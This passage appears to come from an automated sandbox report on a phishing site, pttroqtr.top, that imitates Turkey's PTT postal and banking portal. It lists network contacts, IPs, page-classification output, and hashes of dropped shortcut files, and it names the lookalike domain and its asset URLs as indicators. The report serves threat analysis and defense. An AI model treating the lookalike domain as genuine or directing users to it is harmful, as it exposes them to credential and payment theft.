                                                                                                                                                https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjax1&sid=xZsOXWwlpa9sZhJdAEf0false
                                                                                                                                                  unknown
                                                                                                                                                  https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjj2E&sid=r_NtitDKgtItMN5FAEgDfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://pttroqtr.top/help/layout/images/48.pngfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://pttroqtr.top/help/assets/2e158738kFGym.wofffalse
                                                                                                                                                        unknown
                                                                                                                                                        https://pttroqtr.top/help/assets/f3c7e6fbJxKnW.jsfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://pttroqtr.top/help/layout/images/52.pngfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://www.ptt.gov.tr/_next/static/chunks/pages/%5Bslug%5D-88e5a3b326ec670d.jsfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://pttroqtr.top/help/assets/09bf01f8JxKnW.jsfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://pttroqtr.top/help/layout/images/35.pngfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://pttem.alo-tech.com/chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=falsefalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjiTgfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://pttroqtr.top/socket.io/?EIO=4&transport=polling&t=P8sjep5&sid=DijwWc-tALPoXXo3AEf9false
                                                                                                                                                                        unknown
                                                                                                                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                        http://fontawesome.iochromecache_350.2.dr, chromecache_219.2.drfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://stats.g.doubleclick.net/g/collectchromecache_293.2.dr, chromecache_325.2.drfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://jqueryui.comchromecache_350.2.drfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://creativecommons.org/licenses/by/3.0/chromecache_219.2.drfalseunknown
                                                                                                                                                                        http://opensource.org/licenses/mit-license.htmlchromecache_219.2.drfalseunknown
                                                                                                                                                                        https://fontawesome.comchromecache_282.2.dr, chromecache_253.2.drfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.google.comchromecache_325.2.drfalseunknown
                                                                                                                                                                        http://www.opensource.org/licenses/mit-license.phpchromecache_350.2.drfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://twitter.com/fontawesome.chromecache_219.2.drfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://getbootstrap.com)chromecache_350.2.dr, chromecache_198.2.dr, chromecache_326.2.dr, chromecache_327.2.drfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://twitter.com/byscuitschromecache_219.2.drfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://kyruus.comchromecache_219.2.drfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://ianlunn.github.io/Hover/)chromecache_350.2.drfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://github.com/joewalnes/reconnecting-websocket/chromecache_288.2.dr, chromecache_287.2.drfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://cct.google/taggy/agent.jschromecache_293.2.dr, chromecache_325.2.drfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://ianlunn.co.uk/chromecache_350.2.drfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_350.2.dr, chromecache_327.2.drfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://github.com/IanLunn/Hoverchromecache_350.2.drfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://github.com/faisalman/ua-parser-jschromecache_290.2.dr, chromecache_225.2.drfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                            34.107.233.18
                                                                                                                                                                                            chat-server.alo-tech.comUnited States
                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                            8.211.203.165
                                                                                                                                                                                            pttroqtr.topSingapore
                                                                                                                                                                                            45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                                                                                            142.250.185.132
                                                                                                                                                                                            www.google.comUnited States
                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                            185.220.152.26
                                                                                                                                                                                            www.ptt.gov.trTurkey
                                                                                                                                                                                            205335ASN_PTTTRfalse
                                                                                                                                                                                            35.201.78.44
                                                                                                                                                                                            lb-p3.alo-tech.comUnited States
                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                            104.18.11.207
                                                                                                                                                                                            netdna.bootstrapcdn.comUnited States
                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                            239.255.255.250
                                                                                                                                                                                            unknownReserved
                                                                                                                                                                                            unknownunknownfalse
                                                                                                                                                                                            IP
                                                                                                                                                                                            192.168.2.6
                                                                                                                                                                                            192.168.2.5
                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                            Analysis ID:1521185
                                                                                                                                                                                            Start date and time:2024-09-28 05:38:21 +02:00
                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                            Overall analysis duration:0h 3m 53s
                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                            Report type:full
                                                                                                                                                                                            Cookbook file name:browseurl.jbs
                                                                                                                                                                                            Sample URL:http://pttroqtr.top/help
                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                            Number of analysed new started processes analysed:7
                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                            Technologies:
                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                            Classification:mal60.phis.win@28/300@29/9
                                                                                                                                                                                            EGA Information:Failed
                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                            • Browse: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
                                                                                                                                                                                            • Browse: https://www.ptt.gov.tr/Sayfalar/Posta/PulVeFilateliUst.aspx
                                                                                                                                                                                            • Browse: https://www.ptt.gov.tr/Sayfalar/Posta/UETS.aspx
                                                                                                                                                                                            • Browse: https://www.ptt.gov.tr/Sayfalar/Posta/KayitliElektronikPosta.aspx
                                                                                                                                                                                            • Browse: https://www.ptt.gov.tr/Sayfalar/Kargo/PttYurtIciKargoHizmetleri.aspx
                                                                                                                                                                                            • Browse: https://www.ptt.gov.tr/Sayfalar/Kargo/PttYurtDisiKargoHizmetleriUst.aspx
                                                                                                                                                                                            • Browse: https://www.ptt.gov.tr/Sayfalar/Banka/PttKartPttMatikUst.aspx
                                                                                                                                                                                            • Browse: https://www.ptt.gov.tr/Sayfalar/Kargo/AmbalajHizmetleri.aspx
                                                                                                                                                                                            • Browse: https://www.ptt.gov.tr/Sayfalar/Banka/OdemeIslemleriUst.aspx
                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 142.250.184.195, 216.58.206.78, 66.102.1.84, 34.104.35.123, 199.232.210.172, 4.245.163.56, 192.229.221.95, 20.3.187.198, 142.250.186.106, 142.250.186.74, 172.217.16.202, 142.250.184.202, 216.58.212.170, 172.217.18.10, 142.250.181.234, 142.250.185.234, 142.250.185.202, 142.250.186.42, 142.250.186.170, 216.58.206.74, 142.250.184.234, 216.58.206.42, 172.217.18.106, 142.250.186.138, 142.250.185.136, 142.250.185.200, 142.250.186.174, 13.85.23.206, 142.250.185.106, 142.250.185.74, 142.250.185.138, 142.250.185.195, 142.250.184.227, 87.248.205.0
                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, fonts.gstatic.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, www.googletagmanager.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.google-analytics.com
                                                                                                                                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                            No simulations
                                                                                                                                                                                            InputOutput
                                                                                                                                                                                            URL: https://pttroqtr.top/help/ Model: jbxai
                                                                                                                                                                                            {
                                                                                                                                                                                            "brand":["Ptt"],
                                                                                                                                                                                            "contains_trigger_text":true,
                                                                                                                                                                                            "trigger_text":"Aradnz Sayfa Bulunamad",
                                                                                                                                                                                            "prominent_button_name":"ABONE OL",
                                                                                                                                                                                            "text_input_field_labels":["Tarifeler",
                                                                                                                                                                                            "Gizlilik",
                                                                                                                                                                                            "Yasal Uyarilar",
                                                                                                                                                                                            "Skca Sorulan Sorular",
                                                                                                                                                                                            "Bilgi Edinme",
                                                                                                                                                                                            "Iletiim Bilgileri",
                                                                                                                                                                                            "Msteri Memnuniyeti"],
                                                                                                                                                                                            "pdf_icon_visible":false,
                                                                                                                                                                                            "has_visible_captcha":false,
                                                                                                                                                                                            "has_urgent_text":true,
                                                                                                                                                                                            "has_visible_qrcode":false}
                                                                                                                                                                                            URL: https://pttroqtr.top/help/ Model: jbxai
                                                                                                                                                                                            {
                                                                                                                                                                                            "brand":[],
                                                                                                                                                                                            "contains_trigger_text":false,
                                                                                                                                                                                            "trigger_text":"",
                                                                                                                                                                                            "prominent_button_name":"Devam Etmek",
                                                                                                                                                                                            "text_input_field_labels":["Tebliat",
                                                                                                                                                                                            "Kaytl Elektronik Posta",
                                                                                                                                                                                            "Ulusal Elektronik Tebligat Sistemi"],
                                                                                                                                                                                            "pdf_icon_visible":false,
                                                                                                                                                                                            "has_visible_captcha":false,
                                                                                                                                                                                            "has_urgent_text":false,
                                                                                                                                                                                            "has_visible_qrcode":false}
                                                                                                                                                                                            URL: https://pttroqtr.top/help/ Model: jbxai
                                                                                                                                                                                            {
                                                                                                                                                                                            "brand":["Posta Hizmetleri"],
                                                                                                                                                                                            "contains_trigger_text":false,
                                                                                                                                                                                            "trigger_text":"",
                                                                                                                                                                                            "prominent_button_name":"Devam Etmek",
                                                                                                                                                                                            "text_input_field_labels":["Posta Hizmetleri",
                                                                                                                                                                                            "Telgraf",
                                                                                                                                                                                            "Diger Posta Iglemleri",
                                                                                                                                                                                            "Pul ve Filateli",
                                                                                                                                                                                            "BANKACILIK HIZMETLERI",
                                                                                                                                                                                            "Havale Iglemleri",
                                                                                                                                                                                            "Hesap Iglemleri",
                                                                                                                                                                                            "Pttkart & Pttmatik",
                                                                                                                                                                                            "Ptt Yurt Ici Kargo Hizmetleri"],
                                                                                                                                                                                            "pdf_icon_visible":false,
                                                                                                                                                                                            "has_visible_captcha":false,
                                                                                                                                                                                            "has_urgent_text":false,
                                                                                                                                                                                            "has_visible_qrcode":false}
                                                                                                                                                                                            URL: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx Model: jbxai
                                                                                                                                                                                            {
                                                                                                                                                                                            "brand":["Ptt"],
                                                                                                                                                                                            "contains_trigger_text":false,
                                                                                                                                                                                            "trigger_text":"unknown",
                                                                                                                                                                                            "prominent_button_name":"ABONE OL",
                                                                                                                                                                                            "text_input_field_labels":"unknown",
                                                                                                                                                                                            "pdf_icon_visible":false,
                                                                                                                                                                                            "has_visible_captcha":false,
                                                                                                                                                                                            "has_urgent_text":false,
                                                                                                                                                                                            "has_visible_qrcode":false}
                                                                                                                                                                                            URL: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx Model: jbxai
                                                                                                                                                                                            {
                                                                                                                                                                                            "brand":["Ptt",
                                                                                                                                                                                            "Turkiye Yuzyili"],
                                                                                                                                                                                            "contains_trigger_text":true,
                                                                                                                                                                                            "trigger_text":"Aradiginiz Sayfa Bulunamadi",
                                                                                                                                                                                            "prominent_button_name":"ABONE OL",
                                                                                                                                                                                            "text_input_field_labels":["Tarifeler",
                                                                                                                                                                                            "Gizlilik",
                                                                                                                                                                                            "Yasal Uyarilar",
                                                                                                                                                                                            "Sikca Sorulan Sorular",
                                                                                                                                                                                            "Bilgi Edinme",
                                                                                                                                                                                            "Iletisim Bilgileri",
                                                                                                                                                                                            "Musteri Memnuniyeti"],
                                                                                                                                                                                            "pdf_icon_visible":false,
                                                                                                                                                                                            "has_visible_captcha":false,
                                                                                                                                                                                            "has_urgent_text":false,
                                                                                                                                                                                            "has_visible_qrcode":false}
                                                                                                                                                                                            No context
                                                                                                                                                                                            No context
                                                                                                                                                                                            No context
                                                                                                                                                                                            No context
                                                                                                                                                                                            No context
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Sep 28 02:39:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2677
                                                                                                                                                                                            Entropy (8bit):3.9801583442693835
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:88nduTKKGHpidAKZdA19ehwiZUklqeh3y+3:8Bvg8y
                                                                                                                                                                                            MD5:BAD0BCB4378612301A7A0DACD209631D
                                                                                                                                                                                            SHA1:8378BFBDA04A97C71FF716065344DBCF3520C327
                                                                                                                                                                                            SHA-256:DAB8445ADAE22F9B3C2CB29DB20603BC841316D0ECD34569372FF7EE333B58D5
                                                                                                                                                                                            SHA-512:B5897D14398A6A82028D1C4F13E3702D5C830061F2C7456E7DBE8C3439A4ECFF958C8B75EA9B13C516769B794FC8B5B1CF7B0B438A4064DD33E78D5985D041E3
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,.....n..W...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V<Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............._.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Sep 28 02:39:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2679
                                                                                                                                                                                            Entropy (8bit):3.99912426513334
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:8fduTKKGHpidAKZdA1weh/iZUkAQkqehsy+2:8Ava9Qly
                                                                                                                                                                                            MD5:FE09CA439D18EE50C0412654393942DC
                                                                                                                                                                                            SHA1:2DA2109B51A6FE839D823D7DDB685C37B5BDAFE9
                                                                                                                                                                                            SHA-256:6CFA24B586CF95DF3285DFF5634395E8FA9F4C5833ABCFA296D7E436CEED675C
                                                                                                                                                                                            SHA-512:69AE5593F75BA9EBD4CA5DE4E3FB969CC36ADC89AAF8FE3EC3098FF78D9589099C46153F9166DB2A8AD483340E20B2D1DAA2194017A64DEC81CA6D8D977DCD0E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,........W...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V<Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............._.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2693
                                                                                                                                                                                            Entropy (8bit):4.008703813312134
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:8xTduTKKsHpidAKZdA14tseh7sFiZUkmgqeh7syy+BX:8xUv0ngy
                                                                                                                                                                                            MD5:25D6A5DF3840E5E0FE8658016BA11692
                                                                                                                                                                                            SHA1:9C1515DF47415CA4B97CD4519805F31BC441B496
                                                                                                                                                                                            SHA-256:CAEDE91DF65C7E48839319D905EB0B8848241CD6F276430E2CDFDE44F2BE6DBC
                                                                                                                                                                                            SHA-512:0B3D38E8B06F1204D3D0D9A5C912B3F22190EC731594B0631E25CBE587C26FE0F5F12F89F7F88F16A52110ED0E685DD4C261788203575754C8070DEF0BFBDCDE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............._.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Sep 28 02:39:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2681
                                                                                                                                                                                            Entropy (8bit):3.9924383637895504
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:8iduTKKGHpidAKZdA1vehDiZUkwqeh4y+R:8nvBKy
                                                                                                                                                                                            MD5:FC040EC8C2102E5C4997689E57D6B5AC
                                                                                                                                                                                            SHA1:BBE6F6FC84C7418CC5C6AD18A5C4C72F143981F9
                                                                                                                                                                                            SHA-256:AD76947A3D0852F5481F362F3E187AC0BBE5AB4E154019EDF8D879E6EDC75AD6
                                                                                                                                                                                            SHA-512:02BE0198B7B975445AD9628AFC5BC6C2744D6164E201B40DB9A500216C91224F26A47C1F8204602DE5EE286DA8374A690792B0C0C8C5145F7ACBB43081AB3336
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,.....+..W...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V<Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............._.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Sep 28 02:39:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2681
                                                                                                                                                                                            Entropy (8bit):3.9847162294338583
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:8fduTKKGHpidAKZdA1hehBiZUk1W1qehmy+C:8AvB9Gy
                                                                                                                                                                                            MD5:E94F2FBFCADA5CFA23C6D9B207B2F5B9
                                                                                                                                                                                            SHA1:1E263F5D62EA074D65193B076F7AE7ABAFF23CEC
                                                                                                                                                                                            SHA-256:653C7E64879C7F2CE2236F2B4F6D40EAF67401783FE02A95BA60BE055E4C4C99
                                                                                                                                                                                            SHA-512:BD2E95AFE0A4F9A96A7AB4F0399CE88A15592F32ACFDF2CC5810EBFB3A2D0675F89BF6C9C1CD46110DE6BD3D8837FFE5B94CCF2CA429705AE7EFDA7A059FEB97
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:L..................F.@.. ...$+.,....[Y..W...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V<Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............._.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Sep 28 02:39:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2683
                                                                                                                                                                                            Entropy (8bit):3.995468231634227
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:8sivduTKKGHpidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbgy+yT+:8Kv9T/TbxWOvTbgy7T
                                                                                                                                                                                            MD5:2B791390C5F3A8EF3B9D7D1E96496D11
                                                                                                                                                                                            SHA1:E6A6291D833213E5BDD279A314BF6B0CED8984DB
                                                                                                                                                                                            SHA-256:37BCB6674EA217379C7FB0997CB3F89C9E296E4A419773709C51BEB0220CFE9D
                                                                                                                                                                                            SHA-512:365AED69D32D6310C1092EF67995F1762E8737A745C02729F158643E4837E2438DD7B3D85F5C866E3137EAAE68AF07E123F75F47AF088772C7AE16E00524F14E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
